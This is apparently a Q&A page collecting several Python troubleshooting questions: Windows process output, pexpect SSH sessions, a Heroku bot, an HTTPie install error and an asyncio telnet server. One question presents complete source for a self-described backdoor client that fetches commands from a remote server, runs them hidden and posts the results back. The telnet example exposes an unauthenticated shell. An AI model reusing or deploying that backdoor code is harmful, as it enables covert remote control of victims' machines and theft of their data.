Redirect multiprocessing.Process output properly - windows

I want to spawn a process and redirect its stdout/stderr.
With subprocess.Popen this example seems to work properly but not with multiprocessing.Process.
main script:
from multiprocessing import Process, set_start_method
import subprocess
import os

os.chdir(os.path.dirname(__file__))

def sub():
    import sys
    sys.stdout = None
    sys.stderr = None
    sys.__stdout__ = None
    sys.__stderr__ = None
    subprocess.run(["tasklist"])
    print("Test") # is not printed. OK!

if __name__ == "__main__":
    set_start_method("spawn")

    ## multiprocessing.Process: tasklist output IS printed on console and is not redirected via sys.stdout. Why?
    p = Process(target=sub)
    p.start()
    p.join()

    ## subprocess.Popen: tasklist output is printed to the file
    fh = open("out", "w")
    p2 = subprocess.Popen("python popen.py",
                          stdout=fh)
    fh.close()
Content of popen.py:
import subprocess

if __name__ == "__main__":
    subprocess.run(["tasklist"])
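A note by way of illustration, not part of the original post: setting sys.stdout to None only replaces the Python-level wrapper object; subprocess.run() in the multiprocessing child inherits the OS-level standard handles, which on Windows still point at the parent's console. To silence or capture the tasklist output you have to redirect at the subprocess call itself. A minimal sketch (the file name is made up for this example):

def sub():
    # hand subprocess an explicit handle so redirection happens at the OS level;
    # "child_out.txt" is a hypothetical name used only for this sketch
    with open("child_out.txt", "w") as fh:
        subprocess.run(["tasklist"], stdout=fh, stderr=subprocess.STDOUT)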

Related

issue about pexpect logfile_read

I use pexpect to open SSH connections and run commands on a remote server. The commands are executed, but the results displayed on the terminal are not as expected. The code looks like this (at first there was no time.sleep; it was added for debugging):
import logging
import time
from pexpectUtility import Session

logger = logging.getLogger(__name__)

def test_create_and_show():
    cliPrompt = 'dev-r0'
    hostPrompt = 'admin#dev-r0'
    aa = Session()
    aa.connect("admin", "password", "10.10.0.10")
    time.sleep(2)
    aa.child.sendline("sonic-cli")
    aa.child.expect(cliPrompt, 3)
    tTime = 0
    time.sleep(tTime)
    aa.child.sendline("configure terminal")
    aa.child.expect(cliPrompt, 3)
    time.sleep(tTime)
    aa.child.sendline("end")
    aa.child.expect(cliPrompt, 3)
    time.sleep(tTime)
    aa.child.sendline("exit")
    aa.child.expect(hostPrompt, 3)
    aa.disconnect()
pexpectUtility.py:
import sys
import logging as log

if sys.platform == 'win32':
    import WExpect as pexpect
    spawn_class = pexpect.spawn_windows
else:
    import pexpect
    spawn_class = pexpect.spawn

class MutliIO:
    def __init__(self, *fds):
        self.fds = fds

    def write(self, data):
        for fd in self.fds:
            fd.write(data)

    def flush(self):
        for fd in self.fds:
            fd.flush()

class Session(spawn_class):
    def __init__(self):
        self.child = None

    def connect(self, username, password, serverIp, protocol='ssh'):
        self.protocol = protocol
        self.username = username
        self.password = password
        self.serverIp = serverIp
        if protocol == 'ssh':
            cmd = "ssh -x -o StrictHostKeyChecking=no -l %s " % self.username
        else:
            cmd = "telnet "
        cmd = cmd + serverIp
        log.info('Connecting to Dut: %s\n' % (cmd))
        expect_list = ['ogin: $', '[P|p]assword:', '\[confirm\] $',
                       '\[confirm yes/no\]:', '\[yes/no\]:', '\(yes/no\)\?',
                       '\[y/n\]:', '--More--', 'ONIE:/ #',
                       pexpect.TIMEOUT, pexpect.EOF]
        self.child = spawn_class(cmd)
        logfile = open('pexpect.log', 'w')
        self.child.logfile_read = MutliIO(sys.stdout)
        # self.child.logfile_read = MutliIO(sys.stdout, logfile)
        # self.child.logfile_read = MutliIO(logfile)
        try:
            re = self.child.expect(expect_list, 10)
            log.debug("expect pwd: {}".format(re))
        except Exception as err:
            log.error('%s' % err)
            raise
        # login
        try:
            self.child.sendline(self.password)
        except Exception as err:
            raise RuntimeError("login failed!", err)

    def disconnect(self):
        self.child.sendline("exit")
        self.child.expect(pexpect.EOF)
        self.child.close()
        if self.child.logfile_read != None:
            self.child.logfile_read = None
Executed commands are displayed repeatedly, as if they had been entered as batch input. The log is as follows:
admin#dev-r0:~$ sonic-cli
configure terminal
configure terminal
end
exit
dev-r0# configure terminal
dev-r0(config)# end
dev-r0# exit
admin#dev-r0:~$ exit
logout
Connection to 10.10.0.10 closed.
When I set tTime to 5 (a 5-second interval between commands), the log is as expected. I don't think this is a good solution, though, and I would also like to know the root cause:
admin#dev-r0:~$ sonic-cli
dev-r0# configure terminal
dev-r0(config)# end
dev-r0# exit
admin#dev-r0:~$ exit
logout
Connection to 10.10.0.10 closed.
When I implement the same operations directly with expect, there is no need to wait 5 seconds between commands and the log displayed by the terminal is normal.
Why does pexpect have this issue, and how can I solve it? Thanks in advance.
This is not the whole answer, but a first point to fix. After the
sendline("sonic-cli") the first expect() is going to return
immediately, as it will match the prompt admin#dev-r0:~$ which is already
there waiting, before the sonic-cli command arrives. This means the next
command configure terminal is sent immediately after sonic-cli.
You should enhance the connect() routine to expect the admin#dev-r0:~$
prompt before returning, or use this expect instead of the sleep(2) which
should not be necessary.
Referring to pexpect sample code found online, I discovered that the root cause is a code problem: a missing expect() after sendline().
The changes are as follows:
# login
try:
    self.child.sendline(self.password)
    HOST_PROMPT = '\$' # remote server prompt
    re = self.child.expect(HOST_PROMPT)
except Exception as err:
    raise RuntimeError("login failed!", err)
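The same discipline can be applied in the test itself. This is only a hedged hardening sketch, with prompt strings guessed from the log above: the loose pattern 'dev-r0' is a substring of every prompt (shell, CLI, and config mode), so expecting a mode-specific prompt after each sendline() avoids matching stale output that is already in the buffer:

aa.child.sendline("sonic-cli")
aa.child.expect(r'dev-r0# $', 3)            # CLI prompt, not the shell prompt
aa.child.sendline("configure terminal")
aa.child.expect(r'dev-r0\(config\)# $', 3)  # config-mode prompt
aa.child.sendline("end")
aa.child.expect(r'dev-r0# $', 3)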

python program packed by Pyinstaller shows blinking window on windows

I am trying to write a backdoor program in Python, designed with a client-server architecture.
Here is the code of the client:
from subprocess import PIPE, Popen, CREATE_NO_WINDOW
from typing import List, Optional
from datetime import datetime
from time import sleep
from threading import Thread
from socket import socket, AF_INET, SOCK_DGRAM
from getmac import get_mac_address as gma
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SERVER_PORT = 8080
SERVER_ADDRESS = 'https://example.com:' + str(SERVER_PORT)

def get_ip() -> str:
    s = socket(AF_INET, SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    ip = s.getsockname()[0]
    s.close()
    return ip

def get_mac() -> str:
    return gma().replace(':', '')

def announce() -> List[str]:
    requests.post(f'{SERVER_ADDRESS}/announce/{get_id()}', verify=False)

def get_id() -> str:
    return get_ip() + '_' + get_mac()

def get_command() -> Optional[List[str]]:
    try:
        r = requests.get(f'{SERVER_ADDRESS}/command/{get_id()}', verify=False)
    except requests.exceptions.ConnectionError:
        print('Connection to server error.')
        return None
    if r.status_code == 200:
        r = json.loads(r.text)
        status = int(r['status'])
        if status == 1:
            print(f'Get a command from server.')
            return r['command']
        else:
            return None
    else:
        print(f'Server returned status code {r.status_code}.')
        print(f'Here is the response from server:\n{r.text}')
        print()

def run_command():
    while True:
        command = get_command()
        if command is not None:
            p = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, creationflags=CREATE_NO_WINDOW)
            stdout, stderr = p.communicate()
            data = {
                'command': command,
                'result': stdout.decode() + stderr.decode(),
                'timestamp': datetime.now().strftime('%Y.%m.%d %H:%M:%S'),
            }
            requests.post(f'{SERVER_ADDRESS}/result/{get_id()}', json=data, verify=False)
        sleep(5)

announce()
Thread(target=run_command).start()
The program runs well, and I pack the Python file into an exe with PyInstaller using the following command on Windows:
pyinstaller -F -w program.py
-F for one-file
-w for window hiding
The packed program (exe file) runs well, but a Windows terminal window flashes at roughly 1 Hz. The behavior is strange and I need help.
The blinking window is NOT caused by my subprocess call, because the window keeps blinking even if I don't send any command to the client.
I have googled the problem briefly, but found nothing helpful. I don't know why the window keeps blinking, and I think that is also why my searches turn up nothing.
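One hedged guess, not confirmed anywhere in the question: the getmac library can shell out to external commands on Windows, and in a -w (windowed) PyInstaller build each such child process may briefly open its own console, which would explain flashes even when no command has been received. A minimal sketch to test that theory is to compute the id once at startup instead of on every polling cycle:

# Sketch only: cache the id so gma()/get_ip() run once instead of every cycle.
CLIENT_ID = get_ip() + '_' + get_mac()

def get_id() -> str:
    return CLIENT_ID

If the flashing slows down or stops after this change, the repeated external calls were the culprit.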

My application on the heroku server stops after running for 1 minute (PYTHON)

My application on the Heroku server stops after running for 1 minute. After that it only runs and responds to the commands sent to it sporadically, whenever it feels like it. I was wondering if it could be the 30-minute limit, but it never ran that long.
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import commands as c

TOKEN = "--------------"

def main():
    updater = Updater(TOKEN, use_context=True)
    dp = updater.dispatcher

    # my commands
    dp.add_handler(CommandHandler("start", c.start_command))
    # when I write an unknown word that the bot doesn't know
    dp.add_handler(MessageHandler(Filters.text, c.wrong_command))

    updater.start_polling()
    updater.idle()

if __name__ == "__main__":
    main()

# commands.py
from telegram.ext import Updater

def start_command(update, context):
    message = "hi!"
    return update.message.reply_text(message)

def wrong_command(update, context):
    message = "/start only"
    return update.message.reply_text(message)
requirements.txt:
python-telegram-bot
Procfile:
web: python main.py
There is not much in these files.

http command : SyntaxError: invalid syntax on file core.py

I am trying to install and run the http command (HTTPie) on Ubuntu 18.04.4 LTS.
I think I have installed it successfully, but when I check the version with http --version, or try to connect to a website, say http github.org, I get the following:
Traceback (most recent call last):
  File "/usr/local/bin/http", line 8, in <module>
    sys.exit(main())
  File "/usr/local/lib/python2.7/dist-packages/httpie/__main__.py", line 10, in main
    from .core import main
  File "/usr/local/lib/python2.7/dist-packages/httpie/core.py", line 21
    args: List[Union[str, bytes]] = sys.argv,
        ^
SyntaxError: invalid syntax
Here is what my main.py looks like:
#!/usr/bin/env python
"""The main entry point. Invoke as `http' or `python -m httpie'.
"""
import sys

def main():
    try:
        from .core import main
        exit_status = main()
    except KeyboardInterrupt:
        from httpie.status import ExitStatus
        exit_status = ExitStatus.ERROR_CTRL_C
    sys.exit(exit_status.value)

if __name__ == '__main__':
    main()
And core.py (the one installed under the python2.7 dist-packages):
import argparse
import os
import platform
import sys
from typing import List, Union

import requests
from pygments import __version__ as pygments_version
from requests import __version__ as requests_version

from httpie import __version__ as httpie_version
from httpie.client import collect_messages
from httpie.context import Environment
from httpie.downloads import Downloader
from httpie.output.writer import write_message, write_stream
from httpie.plugins import plugin_manager
from httpie.status import ExitStatus, http_status_to_exit_status


def main(
    args: List[Union[str, bytes]] = sys.argv,
    env=Environment(),
) -> ExitStatus:
    """
    The main function.

    Pre-process args, handle some special types of invocations,
    and run the main program with error handling.

    Return exit status code.
    """
    program_name, *args = args
    env.program_name = os.path.basename(program_name)
    args = decode_raw_args(args, env.stdin_encoding)
    plugin_manager.load_installed_plugins()

    from httpie.cli.definition import parser

    if env.config.default_options:
        args = env.config.default_options + args

    include_debug_info = '--debug' in args
    include_traceback = include_debug_info or '--traceback' in args

    if include_debug_info:
        print_debug_info(env)
        if args == ['--debug']:
            return ExitStatus.SUCCESS

    exit_status = ExitStatus.SUCCESS

    try:
        parsed_args = parser.parse_args(
            args=args,
            env=env,
        )
    except KeyboardInterrupt:
        env.stderr.write('\n')
        if include_traceback:
            raise
        exit_status = ExitStatus.ERROR_CTRL_C
    except SystemExit as e:
        if e.code != ExitStatus.SUCCESS:
            env.stderr.write('\n')
            if include_traceback:
                raise
            exit_status = ExitStatus.ERROR
    else:
        try:
            exit_status = program(
                args=parsed_args,
                env=env,
            )
        except KeyboardInterrupt:
            env.stderr.write('\n')
            if include_traceback:
                raise
            exit_status = ExitStatus.ERROR_CTRL_C
        except SystemExit as e:
            if e.code != ExitStatus.SUCCESS:
                env.stderr.write('\n')
                if include_traceback:
                    raise
                exit_status = ExitStatus.ERROR
        except requests.Timeout:
            exit_status = ExitStatus.ERROR_TIMEOUT
            env.log_error(f'Request timed out ({parsed_args.timeout}s).')
        except requests.TooManyRedirects:
            exit_status = ExitStatus.ERROR_TOO_MANY_REDIRECTS
            env.log_error(
                f'Too many redirects'
                f' (--max-redirects=parsed_args.max_redirects).'
            )
        except Exception as e:
            # TODO: Further distinction between expected and unexpected errors.
            msg = str(e)
            if hasattr(e, 'request'):
                request = e.request
                if hasattr(request, 'url'):
                    msg = (
                        f'{msg} while doing a {request.method}'
                        f' request to URL: {request.url}'
                    )
            env.log_error(f'{type(e).__name__}: {msg}')
            if include_traceback:
                raise
            exit_status = ExitStatus.ERROR

    return exit_status


def program(
    args: argparse.Namespace,
    env: Environment,
) -> ExitStatus:
    """
    The main program without error handling.
    """
    exit_status = ExitStatus.SUCCESS
    downloader = None

    try:
        if args.download:
            args.follow = True  # --download implies --follow.
            downloader = Downloader(
                output_file=args.output_file,
                progress_file=env.stderr,
                resume=args.download_resume
            )
            downloader.pre_request(args.headers)

        initial_request = None
        final_response = None

        for message in collect_messages(args, env.config.directory):
            write_message(
                requests_message=message,
                env=env,
                args=args,
            )
            if isinstance(message, requests.PreparedRequest):
                if not initial_request:
                    initial_request = message
            else:
                final_response = message
                if args.check_status or downloader:
                    exit_status = http_status_to_exit_status(
                        http_status=message.status_code,
                        follow=args.follow
                    )
                    if (not env.stdout_isatty
                            and exit_status != ExitStatus.SUCCESS):
                        env.log_error(
                            f'HTTP {message.raw.status} {message.raw.reason}',
                            level='warning'
                        )

        if downloader and exit_status == ExitStatus.SUCCESS:
            # Last response body download.
            download_stream, download_to = downloader.start(
                initial_url=initial_request.url,
                final_response=final_response,
            )
            write_stream(
                stream=download_stream,
                outfile=download_to,
                flush=False,
            )
            downloader.finish()
            if downloader.interrupted:
                exit_status = ExitStatus.ERROR
                env.log_error(
                    'Incomplete download: size=%d; downloaded=%d' % (
                        downloader.status.total_size,
                        downloader.status.downloaded
                    ))
        return exit_status

    finally:
        if downloader and not downloader.finished:
            downloader.failed()
        if (not isinstance(args, list) and args.output_file
                and args.output_file_specified):
            args.output_file.close()


def print_debug_info(env: Environment):
    env.stderr.writelines([
        f'HTTPie {httpie_version}\n',
        f'Requests {requests_version}\n',
        f'Pygments {pygments_version}\n',
        f'Python {sys.version}\n{sys.executable}\n',
        f'{platform.system()} {platform.release()}',
    ])
    env.stderr.write('\n\n')
    env.stderr.write(repr(env))
    env.stderr.write('\n')


def decode_raw_args(
    args: List[Union[str, bytes]],
    stdin_encoding: str
) -> List[str]:
    """
    Convert all bytes args to str
    by decoding them using stdin encoding.
    """
    return [
        arg.decode(stdin_encoding)
        if type(arg) == bytes else arg
        for arg in args
    ]
I have two versions of Python installed on my system. As I understand it, Python 2.7 came pre-installed and I installed Python 3 myself.
Currently the default python version is Python 3.
What could cause the error? Is it my different Python versions or an actual syntax error?
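It is the Python version, not a bug in core.py: the traceback shows HTTPie installed under /usr/local/lib/python2.7/dist-packages, and the annotated signature args: List[Union[str, bytes]] = sys.argv (as well as the f-strings further down) is Python 3-only syntax, so Python 2.7 stops with SyntaxError at that line. A hedged sketch of a fix, assuming pip points at Python 2 and pip3/python3 at Python 3 (sudo may be needed depending on how it was installed):

pip uninstall httpie            # remove the copy installed under Python 2.7
python3 -m pip install --user httpie
http --version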

how to await two tasks in a coroutine?

I am studying asyncio on Python 3.7.5, and I chose implementing a telnetd as my exercise.
After some coding, I found it is almost done, except for one weird thing. Code below:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
import os
import pty
import sys
import termios
from subprocess import Popen

async def copyto(src, dst):
    while True:
        if getattr(src, 'read', None):
            # print(f"src has read")
            buf = await src.read(1024)
        else:
            # print(f"src dont have read")
            buf = os.read(src, 1024)
        if getattr(dst, 'write', None):
            # print(f"dst has write")
            dst.write(buf)
            await dst.drain()
        else:
            # print(f"dst dont has write")
            os.write(dst, buf)

async def handlerCommand(reader, writer):
    # command = 'podman run -it --rm alpine bash'
    command = 'bash'
    oldTty = termios.tcgetattr(sys.stdin)
    # open pseudo-terminal to interact with subprocess
    masterFd, slaveFd = pty.openpty()
    # force remote side into character mode
    writer.write(b"\xff\xfd\x22\xff\xfb\x01")
    # use os.setsid() make it run in a new process group, or bash job control will not be enabled
    Popen(
        command,
        preexec_fn=os.setsid,
        stdin=slaveFd,
        stdout=slaveFd,
        stderr=slaveFd,
        universal_newlines=True)
    os.write(masterFd, b"ls\n")
    await asyncio.gather(
        copyto(masterFd, writer),
        copyto(reader, masterFd)
    )
    # restore tty settings back
    termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldTty)

async def main(host, port):
    server = await asyncio.start_server(
        handlerCommand,
        host,
        port
    )
    addr = server.sockets[0].getsockname()
    print(f'Serving on {addr}')
    async with server:
        await server.serve_forever()

if __name__ == "__main__":
    asyncio.run(main('127.0.0.1', 8888))
This is fully runnable code. As you can see, when a user connects, I start a bash process and connect it to the user's socket. My problem is that the user can see output from the process, but can't send any keystrokes to it.
I thought it might be a gap in my understanding of asyncio's gather, but I am not sure.
On the client side I just use:
telnet 127.0.0.1 8888
A refactored version of the server is below. The terminal-mode issues are still not solved, but at the asyncio level I think the problem is solved, although the solution is too heavy.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
a telnet server sample
"""
import asyncio
import os
import pty
import tty
from subprocess import Popen
import concurrent.futures

import telnetlib3

async def sock2f(sock, fobj):
    """
    copy from socket to fobj
    """
    while True:
        buf = await sock.read(1)
        if not buf:
            print(f"sock2f break")
            break
        print(f"sock2fd {buf}")
        fobj.write(buf)
        fobj.flush()

async def f2sock(fobj, sock):
    """
    copy from fobj to sock
    """
    print(f"f2sock start")

    def _block_read(length):
        return fobj.read(length)

    loop = asyncio.get_running_loop()
    with concurrent.futures.ThreadPoolExecutor() as pool:
        while True:
            print(f"f2sock readbuf")
            buf = await loop.run_in_executor(pool, _block_read, 32)
            print(f"f2sock readbuf done")
            if not buf:
                print(f"f2sock break")
                break
            print(f"f2sock {buf}")
            sock.write(buf)
            await sock.drain()

async def handlerCommand(reader, writer):
    """
    ha
    """
    # command = 'podman run -it --rm alpine bash'
    command = 'bash'
    # open pseudo-terminal to interact with subprocess
    masterFd, slaveFd = pty.openpty()
    tty.setraw(slaveFd)
    tty.setraw(masterFd)
    Popen(
        command,
        bufsize=0,
        preexec_fn=os.setsid,
        stdin=slaveFd,
        stdout=slaveFd,
        stderr=slaveFd,
        universal_newlines=True,
        # close_fds=True,
        shell=True
    )
    os.write(masterFd, b"ls\n")
    m_read = os.fdopen(masterFd, 'rb')
    m_write = os.fdopen(masterFd, 'wb')
    await asyncio.gather(
        f2sock(m_read, writer),
        sock2f(reader, m_write),
    )

loop = asyncio.get_event_loop()
coro = telnetlib3.create_server(
    port=6023,
    term="xterm-256color",
    encoding=False,
    shell=handlerCommand
)
server = loop.run_until_complete(coro)
loop.run_until_complete(server.wait_closed())
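For what it's worth, the likely reason the first version hung is that the bare os.read(masterFd, 1024) inside copyto() is a blocking call made directly on the event loop, so once bash stops producing output the whole loop stalls and the socket-to-pty direction never runs. A lighter-weight sketch at the asyncio level, untested against the setup above: register the pty master with the loop via loop.add_reader(), so os.read() is only called when data is actually available:

import asyncio
import os

async def bridge(reader, writer, masterFd):
    """Pump data both ways between a telnet client and a pty master fd."""
    loop = asyncio.get_running_loop()

    def pty_readable():
        # invoked by the loop only when masterFd has data, so this never blocks
        try:
            data = os.read(masterFd, 1024)
        except OSError:        # pty closed (bash exited)
            data = b''
        if data:
            writer.write(data)
        else:
            loop.remove_reader(masterFd)

    loop.add_reader(masterFd, pty_readable)
    try:
        while True:
            data = await reader.read(1024)   # socket -> pty
            if not data:
                break
            os.write(masterFd, data)
    finally:
        loop.remove_reader(masterFd)

This replaces the gather of the two copy coroutines with a single coroutine plus a read callback, and avoids the thread pool entirely.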

Resources